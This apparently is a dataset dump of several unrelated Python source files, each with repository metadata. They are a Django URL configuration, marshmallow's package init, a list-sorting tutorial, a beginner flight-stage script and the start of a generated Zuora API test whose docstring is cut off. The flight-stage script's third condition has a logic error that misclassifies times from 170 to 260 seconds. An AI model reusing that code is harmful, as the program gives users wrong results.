2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from users import views as user_views
# Project-level URL routing table.  Auth routes reuse Django's built-in
# class-based views with project templates; registration/profile are
# function-based views in the ``users`` app; everything else is delegated
# to the ``blog`` app's URLconf via the catch-all '' include.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('register/', user_views.register, name='register'),
    path('profile/', user_views.profile, name='profile'),
    path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
    path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
    path('', include('blog.urls')),
]

# Serve user-uploaded media through Django only during development;
# in production MEDIA_ROOT should be served by the web server instead.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"vwangjianing@gmail.com"
] | vwangjianing@gmail.com |
de691e26541b5bab6447b5eb608bc3519d2b21ef | a7cd332b3a21e0a2f78c1a3ffcf67b847ce3d6b7 | /v/Lib/site-packages/marshmallow/__init__.py | f846f8889b84730d8048023e5fdfb41d98726bbe | [] | no_license | ElcyJ/ProjetoFinal-ADS_1 | dcd23376487999146da42d41e828e9428acec576 | 0b8a97af18fa3d9d689fd09b09993619ac918a0e | refs/heads/master | 2022-11-02T00:39:51.398007 | 2018-08-27T16:23:43 | 2018-08-27T16:23:43 | 145,935,118 | 1 | 1 | null | 2022-10-22T13:41:50 | 2018-08-24T03:00:07 | Python | UTF-8 | Python | false | false | 713 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.schema import (
Schema,
SchemaOpts,
MarshalResult,
UnmarshalResult,
)
from . import fields
from marshmallow.decorators import (
pre_dump, post_dump, pre_load, post_load, validates, validates_schema
)
from marshmallow.utils import pprint, missing
from marshmallow.exceptions import ValidationError
# Package version (PEP 396 style) and author metadata.
__version__ = '2.15.4'
__author__ = 'Steven Loria'

# Names re-exported at the package root; this defines what
# ``from marshmallow import *`` brings into scope.
__all__ = [
    'Schema',
    'SchemaOpts',
    'fields',
    'validates',
    'validates_schema',
    'pre_dump',
    'post_dump',
    'pre_load',
    'post_load',
    'pprint',
    'MarshalResult',
    'UnmarshalResult',
    'ValidationError',
    'missing',
]
| [
"Elcy James"
] | Elcy James |
56dcd39af288060735cc5e09b9ee59454fc41084 | d3ba978b2e830a90f9a9b0854cc0884830db7a14 | /2-列表、元组与字典/如何对列表进行排序.py | 70bc126e24ca5773c031da0d41abd793c393387c | [
"MIT"
] | permissive | yxys01/interview | 57c1239b4ecc56b3ec7c4c8ff3f26a8b822c3be7 | f8cdf61bc61575dd8c4ed765c4184aeb47526d25 | refs/heads/master | 2022-04-26T23:06:14.155346 | 2020-04-25T03:47:59 | 2020-04-25T03:47:59 | 258,681,365 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | # 第一题:排序列表的方法
# Question 1: ways to sort a list.
a = [5, 4, 2, 7, 3, 8, 3]
a.sort()  # in-place ascending sort -> [2, 3, 3, 4, 5, 7, 8]
print(a)

b = [6, 4, 3, 3, 76, 2, 234]
c = sorted(b)  # returns a new sorted list, ``b`` is left untouched
print(c)

# Question 2: difference between ``sort`` and ``sorted``:
#   1. ``sort`` is a list method, while ``sorted`` is a standalone function.
#   2. ``sort`` mutates the list itself; ``sorted`` returns a sorted copy.
print(c == b)

# Question 3: descending order.
a.sort(reverse=True)
print(a)
print(sorted(b, reverse=True))
| [
"420393969@qq.com"
] | 420393969@qq.com |
d67638dfec7d1187d63047a5496b52f5082ba82f | 55c3087155f9b18897cd88cb8ec23ac7b0d4b289 | /Task3.py | 63de34b19277eb28ca4bfbc4652fa6052c3f89d0 | [] | no_license | saimy019/PythonPrimers | 5dcb2dac79933e717443294b18f7b95765a1540b | a1acad89d010b1b36e23c92d1dfe8b4747cf63a3 | refs/heads/master | 2022-11-12T16:08:29.486670 | 2020-07-03T03:54:09 | 2020-07-03T03:54:09 | 256,905,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | enterTime = float(input('Enter the time in second to determine the stage of the flight '))
#enterTime = float(enterTime)
if (enterTime >= 0 and enterTime < 100):
print ('The flight is in Stage 1!')
elif (enterTime >= 100 and enterTime < 170):
print ('The flight is in Stage 2!')
elif (enterTime >= 170 and enterTime >= 260):
print ('The flight is in Stage 3!')
else:
print ("The flight is un-powered, please start the flight!")
| [
"63940840+saimy019@users.noreply.github.com"
] | 63940840+saimy019@users.noreply.github.com |
3f93dd4b32902655f6bb93ba2b92506a35e09731 | 2a8a6327fb9a7ce8696aa15b197d5170661fb94f | /test/test_proxy_create_unit_of_measure.py | bd4624567b71d70ed1b83154b833d92e29752db3 | [] | no_license | moderndatainc/zuora-client | 8b88e05132ddf7e8c411a6d7dad8c0baabaa6dad | d50da49ce1b8465c76723496c2561a3b8ebdf07d | refs/heads/master | 2021-09-21T19:17:34.752404 | 2018-08-29T23:24:07 | 2018-08-29T23:24:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,768 | py | # coding: utf-8
"""
Zuora API Reference
# Introduction Welcome to the reference for the Zuora REST API! <a href=\"http://en.wikipedia.org/wiki/REST_API\" target=\"_blank\">REST</a> is a web-service protocol that lends itself to rapid development by using everyday HTTP and JSON technology. The Zuora REST API provides a broad set of operations and resources that: * Enable Web Storefront integration from your website. * Support self-service subscriber sign-ups and account management. * Process revenue schedules through custom revenue rule models. * Enable manipulation of most objects in the Zuora Object Model. Want to share your opinion on how our API works for you? <a href=\"https://community.zuora.com/t5/Developers/API-Feedback-Form/gpm-p/21399\" target=\"_blank\">Tell us how you feel </a>about using our API and what we can do to make it better. ## Access to the API If you have a Zuora tenant, you can access the Zuora REST API via one of the following endpoints: | Tenant | Base URL for REST Endpoints | |-------------------------|-------------------------| |US Production | https://rest.zuora.com | |US API Sandbox | https://rest.apisandbox.zuora.com| |US Performance Test | https://rest.pt1.zuora.com | |EU Production | https://rest.eu.zuora.com | |EU Sandbox | https://rest.sandbox.eu.zuora.com | The Production endpoint provides access to your live user data. API Sandbox tenants are a good place to test code without affecting real-world data. If you would like Zuora to provision an API Sandbox tenant for you, contact your Zuora representative for assistance. **Note:** If you have a tenant in the Production Copy Environment, submit a request at <a href=\"http://support.zuora.com/\" target=\"_blank\">Zuora Global Support</a> to enable the Zuora REST API in your tenant and obtain the base URL for REST endpoints. 
If you do not have a Zuora tenant, go to <a href=\"https://www.zuora.com/resource/zuora-test-drive\" target=\"_blank\">https://www.zuora.com/resource/zuora-test-drive</a> and sign up for a Production Test Drive tenant. The tenant comes with seed data, including a sample product catalog. # API Changelog You can find the <a href=\"https://community.zuora.com/t5/Developers/API-Changelog/gpm-p/18092\" target=\"_blank\">Changelog</a> of the API Reference in the Zuora Community. # Authentication ## OAuth v2.0 Zuora recommends that you use OAuth v2.0 to authenticate to the Zuora REST API. Currently, OAuth is not available in every environment. See [Zuora Testing Environments](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/D_Zuora_Environments) for more information. Zuora recommends you to create a dedicated API user with API write access on a tenant when authenticating via OAuth, and then create an OAuth client for this user. See <a href=\"https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users/Create_an_API_User\" target=\"_blank\">Create an API User</a> for how to do this. By creating a dedicated API user, you can control permissions of the API user without affecting other non-API users. If a user is deactivated, all of the user's OAuth clients will be automatically deactivated. Authenticating via OAuth requires the following steps: 1. Create a Client 2. Generate a Token 3. Make Authenticated Requests ### Create a Client You must first [create an OAuth client](https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users#Create_an_OAuth_Client_for_a_User) in the Zuora UI. To do this, you must be an administrator of your Zuora tenant. This is a one-time operation. You will be provided with a Client ID and a Client Secret. Please note this information down, as it will be required for the next step. **Note:** The OAuth client will be owned by a Zuora user account. 
If you want to perform PUT, POST, or DELETE operations using the OAuth client, the owner of the OAuth client must have a Platform role that includes the \"API Write Access\" permission. ### Generate a Token After creating a client, you must make a call to obtain a bearer token using the [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) operation. This operation requires the following parameters: - `client_id` - the Client ID displayed when you created the OAuth client in the previous step - `client_secret` - the Client Secret displayed when you created the OAuth client in the previous step - `grant_type` - must be set to `client_credentials` **Note**: The Client ID and Client Secret mentioned above were displayed when you created the OAuth Client in the prior step. The [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) response specifies how long the bearer token is valid for. Call [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) again to generate a new bearer token. ### Make Authenticated Requests To authenticate subsequent API requests, you must provide a valid bearer token in an HTTP header: `Authorization: Bearer {bearer_token}` If you have [Zuora Multi-entity](https://www.zuora.com/developer/api-reference/#tag/Entities) enabled, you need to set an additional header to specify the ID of the entity that you want to access. You can use the `scope` field in the [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) response to determine whether you need to specify an entity ID. If the `scope` field contains more than one entity ID, you must specify the ID of the entity that you want to access. 
For example, if the `scope` field contains `entity.1a2b7a37-3e7d-4cb3-b0e2-883de9e766cc` and `entity.c92ed977-510c-4c48-9b51-8d5e848671e9`, specify one of the following headers: - `Zuora-Entity-Ids: 1a2b7a37-3e7d-4cb3-b0e2-883de9e766cc` - `Zuora-Entity-Ids: c92ed977-510c-4c48-9b51-8d5e848671e9` **Note**: For a limited period of time, Zuora will accept the `entityId` header as an alternative to the `Zuora-Entity-Ids` header. If you choose to set the `entityId` header, you must remove all \"-\" characters from the entity ID in the `scope` field. If the `scope` field contains a single entity ID, you do not need to specify an entity ID. ## Other Supported Authentication Schemes Zuora continues to support the following additional legacy means of authentication: * Use username and password. Include authentication with each request in the header: * `apiAccessKeyId` * `apiSecretAccessKey` Zuora recommends that you create an API user specifically for making API calls. See <a href=\"https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users/Create_an_API_User\" target=\"_blank\">Create an API User</a> for more information. * Use an authorization cookie. The cookie authorizes the user to make calls to the REST API for the duration specified in **Administration > Security Policies > Session timeout**. The cookie expiration time is reset with this duration after every call to the REST API. To obtain a cookie, call the [Connections](https://www.zuora.com/developer/api-reference/#tag/Connections) resource with the following API user information: * ID * Password * For CORS-enabled APIs only: Include a 'single-use' token in the request header, which re-authenticates the user with each request. See below for more details. ### Entity Id and Entity Name The `entityId` and `entityName` parameters are only used for [Zuora Multi-entity](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity \"Zuora Multi-entity\"). 
These are the legacy parameters that Zuora will only continue to support for a period of time. Zuora recommends you to use the `Zuora-Entity-Ids` parameter instead. The `entityId` and `entityName` parameters specify the Id and the [name of the entity](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity/B_Introduction_to_Entity_and_Entity_Hierarchy#Name_and_Display_Name \"Introduction to Entity and Entity Hierarchy\") that you want to access, respectively. Note that you must have permission to access the entity. You can specify either the `entityId` or `entityName` parameter in the authentication to access and view an entity. * If both `entityId` and `entityName` are specified in the authentication, an error occurs. * If neither `entityId` nor `entityName` is specified in the authentication, you will log in to the entity in which your user account is created. To get the entity Id and entity name, you can use the GET Entities REST call. For more information, see [API User Authentication](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity/A_Overview_of_Multi-entity#API_User_Authentication \"API User Authentication\"). ### Token Authentication for CORS-Enabled APIs The CORS mechanism enables REST API calls to Zuora to be made directly from your customer's browser, with all credit card and security information transmitted directly to Zuora. This minimizes your PCI compliance burden, allows you to implement advanced validation on your payment forms, and makes your payment forms look just like any other part of your website. For security reasons, instead of using cookies, an API request via CORS uses **tokens** for authentication. The token method of authentication is only designed for use with requests that must originate from your customer's browser; **it should not be considered a replacement to the existing cookie authentication** mechanism. 
See [Zuora CORS REST](https://knowledgecenter.zuora.com/DC_Developers/REST_API/A_REST_basics/G_CORS_REST \"Zuora CORS REST\") for details on how CORS works and how you can begin to implement customer calls to the Zuora REST APIs. See [HMAC Signatures](https://www.zuora.com/developer/api-reference/#operation/POSTHMACSignature \"HMAC Signatures\") for details on the HMAC method that returns the authentication token. # Requests and Responses ## Request IDs As a general rule, when asked to supply a \"key\" for an account or subscription (accountKey, account-key, subscriptionKey, subscription-key), you can provide either the actual ID or the number of the entity. ## HTTP Request Body Most of the parameters and data accompanying your requests will be contained in the body of the HTTP request. The Zuora REST API accepts JSON in the HTTP request body. No other data format (e.g., XML) is supported. ### Data Type ([Actions](https://www.zuora.com/developer/api-reference/#tag/Actions) and CRUD operations only) We recommend that you do not specify the decimal values with quotation marks, commas, and spaces. Use characters of `+-0-9.eE`, for example, `5`, `1.9`, `-8.469`, and `7.7e2`. Also, Zuora does not convert currencies for decimal values. ## Testing a Request Use a third party client, such as [curl](https://curl.haxx.se \"curl\"), [Postman](https://www.getpostman.com \"Postman\"), or [Advanced REST Client](https://advancedrestclient.com \"Advanced REST Client\"), to test the Zuora REST API. You can test the Zuora REST API from the Zuora API Sandbox or Production tenants. If connecting to Production, bear in mind that you are working with your live production data, not sample data or test data. ## Testing with Credit Cards Sooner or later it will probably be necessary to test some transactions that involve credit cards. 
For suggestions on how to handle this, see [Going Live With Your Payment Gateway](https://knowledgecenter.zuora.com/CB_Billing/M_Payment_Gateways/C_Managing_Payment_Gateways/B_Going_Live_Payment_Gateways#Testing_with_Credit_Cards \"C_Zuora_User_Guides/A_Billing_and_Payments/M_Payment_Gateways/C_Managing_Payment_Gateways/B_Going_Live_Payment_Gateways#Testing_with_Credit_Cards\" ). ## Concurrent Request Limits Zuora enforces tenant-level concurrent request limits. See <a href=\"https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Policies/Concurrent_Request_Limits\" target=\"_blank\">Concurrent Request Limits</a> for more information. ## Timeout Limit If a request does not complete within 120 seconds, the request times out and Zuora returns a Gateway Timeout error. ## Error Handling Responses and error codes are detailed in [Responses and errors](https://knowledgecenter.zuora.com/DC_Developers/REST_API/A_REST_basics/3_Responses_and_errors \"Responses and errors\"). # Pagination When retrieving information (using GET methods), the optional `pageSize` query parameter sets the maximum number of rows to return in a response. The maximum is `40`; larger values are treated as `40`. If this value is empty or invalid, `pageSize` typically defaults to `10`. The default value for the maximum number of rows retrieved can be overridden at the method level. If more rows are available, the response will include a `nextPage` element, which contains a URL for requesting the next page. If this value is not provided, no more rows are available. No \"previous page\" element is explicitly provided; to support backward paging, use the previous call. ## Array Size For data items that are not paginated, the REST API supports arrays of up to 300 rows. Thus, for instance, repeated pagination can retrieve thousands of customer accounts, but within any account an array of no more than 300 rate plans is returned. # API Versions The Zuora REST API are version controlled. 
Versioning ensures that Zuora REST API changes are backward compatible. Zuora uses a major and minor version nomenclature to manage changes. By specifying a version in a REST request, you can get expected responses regardless of future changes to the API. ## Major Version The major version number of the REST API appears in the REST URL. Currently, Zuora only supports the **v1** major version. For example, `POST https://rest.zuora.com/v1/subscriptions`. ## Minor Version Zuora uses minor versions for the REST API to control small changes. For example, a field in a REST method is deprecated and a new field is used to replace it. Some fields in the REST methods are supported as of minor versions. If a field is not noted with a minor version, this field is available for all minor versions. If a field is noted with a minor version, this field is in version control. You must specify the supported minor version in the request header to process without an error. If a field is in version control, it is either with a minimum minor version or a maximum minor version, or both of them. You can only use this field with the minor version between the minimum and the maximum minor versions. For example, the `invoiceCollect` field in the POST Subscription method is in version control and its maximum minor version is 189.0. You can only use this field with the minor version 189.0 or earlier. If you specify a version number in the request header that is not supported, Zuora will use the minimum minor version of the REST API. In our REST API documentation, if a field or feature requires a minor version number, we note that in the field description. You only need to specify the version number when you use the fields require a minor version. To specify the minor version, set the `zuora-version` parameter to the minor version number in the request header for the request call. For example, the `collect` field is in 196.0 minor version. 
If you want to use this field for the POST Subscription method, set the `zuora-version` parameter to `196.0` in the request header. The `zuora-version` parameter is case sensitive. For all the REST API fields, by default, if the minor version is not specified in the request header, Zuora will use the minimum minor version of the REST API to avoid breaking your integration. ### Minor Version History The supported minor versions are not serial. This section documents the changes made to each Zuora REST API minor version. The following table lists the supported versions and the fields that have a Zuora REST API minor version. | Fields | Minor Version | REST Methods | Description | |:--------|:--------|:--------|:--------| | invoiceCollect | 189.0 and earlier | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice and collects a payment for a subscription. 
| | collect | 196.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Collects an automatic payment for a subscription. | | invoice | 196.0 and 207.0| [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice for a subscription. 
| | invoiceTargetDate | 196.0 and earlier | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") |Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | invoiceTargetDate | 207.0 and earlier | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | targetDate | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") |Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. 
| | targetDate | 211.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | includeExisting DraftInvoiceItems | 196.0 and earlier| [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | Specifies whether to include draft invoice items in subscription previews. Specify it to be `true` (default) to include draft invoice items in the preview result. Specify it to be `false` to excludes draft invoice items in the preview result. | | includeExisting DraftDocItems | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | Specifies whether to include draft invoice items in subscription previews. 
Specify it to be `true` (default) to include draft invoice items in the preview result. Specify it to be `false` to excludes draft invoice items in the preview result. | | previewType | 196.0 and earlier| [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | The type of preview you will receive. The possible values are `InvoiceItem`(default), `ChargeMetrics`, and `InvoiceItemChargeMetrics`. | | previewType | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | The type of preview you will receive. The possible values are `LegalDoc`(default), `ChargeMetrics`, and `LegalDocChargeMetrics`. | | runBilling | 211.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice or credit memo for a subscription. 
**Note:** Credit memos are only available if you have the Invoice Settlement feature enabled. | | invoiceDate | 214.0 and earlier | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date that should appear on the invoice being generated, as `yyyy-mm-dd`. | | invoiceTargetDate | 214.0 and earlier | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date through which to calculate charges on this account if an invoice is generated, as `yyyy-mm-dd`. | | documentDate | 215.0 and later | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date that should appear on the invoice and credit memo being generated, as `yyyy-mm-dd`. | | targetDate | 215.0 and later | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date through which to calculate charges on this account if an invoice or a credit memo is generated, as `yyyy-mm-dd`. | | memoItemAmount | 223.0 and earlier | [Create credit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_CreditMemoFromPrpc \"Create credit memo from charge\"); [Create debit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_DebitMemoFromPrpc \"Create debit memo from charge\") | Amount of the memo item. | | amount | 224.0 and later | [Create credit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_CreditMemoFromPrpc \"Create credit memo from charge\"); [Create debit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_DebitMemoFromPrpc \"Create debit memo from charge\") | Amount of the memo item. 
| | subscriptionNumbers | 222.4 and earlier | [Create order](https://www.zuora.com/developer/api-reference/#operation/POST_Order \"Create order\") | Container for the subscription numbers of the subscriptions in an order. | | subscriptions | 223.0 and later | [Create order](https://www.zuora.com/developer/api-reference/#operation/POST_Order \"Create order\") | Container for the subscription numbers and statuses in an order. | #### Version 207.0 and Later The response structure of the [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") and [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") methods are changed. The following invoice related response fields are moved to the invoice container: * amount * amountWithoutTax * taxAmount * invoiceItems * targetDate * chargeMetrics # Zuora Object Model The following diagram presents a high-level view of the key Zuora objects. Click the image to open it in a new tab to resize it. <a href=\"https://www.zuora.com/wp-content/uploads/2017/01/ZuoraERD.jpeg\" target=\"_blank\"><img src=\"https://www.zuora.com/wp-content/uploads/2017/01/ZuoraERD.jpeg\" alt=\"Zuora Object Model Diagram\"></a> See the following articles for information about other parts of the Zuora business object model: * <a href=\"https://knowledgecenter.zuora.com/CB_Billing/Invoice_Settlement/D_Invoice_Settlement_Object_Model\" target=\"_blank\">Invoice Settlement Object Model</a> * <a href=\"https://knowledgecenter.zuora.com/BC_Subscription_Management/Orders/BA_Orders_Object_Model\" target=\"_blank\">Orders Object Model</a> You can use the [Describe object](https://www.zuora.com/developer/api-reference/#operation/GET_Describe) operation to list the fields of each Zuora object that is available in your tenant. When you call the operation, you must specify the API name of the Zuora object. 
The following table provides the API name of each Zuora object: | Object | API Name | |-----------------------------------------------|--------------------------------------------| | Account | `Account` | | Accounting Code | `AccountingCode` | | Accounting Period | `AccountingPeriod` | | Amendment | `Amendment` | | Application Group | `ApplicationGroup` | | Billing Run | <p>`BillingRun`</p><p>**Note:** The API name of this object is `BillingRun` in the [Describe object](https://www.zuora.com/developer/api-reference/#operation/GET_Describe) operation and Export ZOQL queries only. Otherwise, the API name of this object is `BillRun`.</p> | | Contact | `Contact` | | Contact Snapshot | `ContactSnapshot` | | Credit Balance Adjustment | `CreditBalanceAdjustment` | | Credit Memo | `CreditMemo` | | Credit Memo Application | `CreditMemoApplication` | | Credit Memo Application Item | `CreditMemoApplicationItem` | | Credit Memo Item | `CreditMemoItem` | | Credit Memo Part | `CreditMemoPart` | | Credit Memo Part Item | `CreditMemoPartItem` | | Credit Taxation Item | `CreditTaxationItem` | | Custom Exchange Rate | `FXCustomRate` | | Debit Memo | `DebitMemo` | | Debit Memo Item | `DebitMemoItem` | | Debit Taxation Item | `DebitTaxationItem` | | Discount Applied Metrics | `DiscountAppliedMetrics` | | Entity | `Tenant` | | Gateway Reconciliation Event | `PaymentGatewayReconciliationEventLog` | | Gateway Reconciliation Job | `PaymentReconciliationJob` | | Gateway Reconciliation Log | `PaymentReconciliationLog` | | Invoice | `Invoice` | | Invoice Adjustment | `InvoiceAdjustment` | | Invoice Item | `InvoiceItem` | | Invoice Item Adjustment | `InvoiceItemAdjustment` | | Invoice Payment | `InvoicePayment` | | Journal Entry | `JournalEntry` | | Journal Entry Item | `JournalEntryItem` | | Journal Run | `JournalRun` | | Order | `Order` | | Order Action | `OrderAction` | | Order ELP | `OrderElp` | | Order Item | `OrderItem` | | Order MRR | `OrderMrr` | | Order Quantity | `OrderQuantity` | | 
Order TCB | `OrderTcb` | | Order TCV | `OrderTcv` | | Payment | `Payment` | | Payment Application | `PaymentApplication` | | Payment Application Item | `PaymentApplicationItem` | | Payment Method | `PaymentMethod` | | Payment Method Snapshot | `PaymentMethodSnapshot` | | Payment Method Transaction Log | `PaymentMethodTransactionLog` | | Payment Method Update | `UpdaterDetail` | | Payment Part | `PaymentPart` | | Payment Part Item | `PaymentPartItem` | | Payment Run | `PaymentRun` | | Payment Transaction Log | `PaymentTransactionLog` | | Processed Usage | `ProcessedUsage` | | Product | `Product` | | Product Rate Plan | `ProductRatePlan` | | Product Rate Plan Charge | `ProductRatePlanCharge` | | Product Rate Plan Charge Tier | `ProductRatePlanChargeTier` | | Rate Plan | `RatePlan` | | Rate Plan Charge | `RatePlanCharge` | | Rate Plan Charge Tier | `RatePlanChargeTier` | | Refund | `Refund` | | Refund Application | `RefundApplication` | | Refund Application Item | `RefundApplicationItem` | | Refund Invoice Payment | `RefundInvoicePayment` | | Refund Part | `RefundPart` | | Refund Part Item | `RefundPartItem` | | Refund Transaction Log | `RefundTransactionLog` | | Revenue Charge Summary | `RevenueChargeSummary` | | Revenue Charge Summary Item | `RevenueChargeSummaryItem` | | Revenue Event | `RevenueEvent` | | Revenue Event Credit Memo Item | `RevenueEventCreditMemoItem` | | Revenue Event Debit Memo Item | `RevenueEventDebitMemoItem` | | Revenue Event Invoice Item | `RevenueEventInvoiceItem` | | Revenue Event Invoice Item Adjustment | `RevenueEventInvoiceItemAdjustment` | | Revenue Event Item | `RevenueEventItem` | | Revenue Event Item Credit Memo Item | `RevenueEventItemCreditMemoItem` | | Revenue Event Item Debit Memo Item | `RevenueEventItemDebitMemoItem` | | Revenue Event Item Invoice Item | 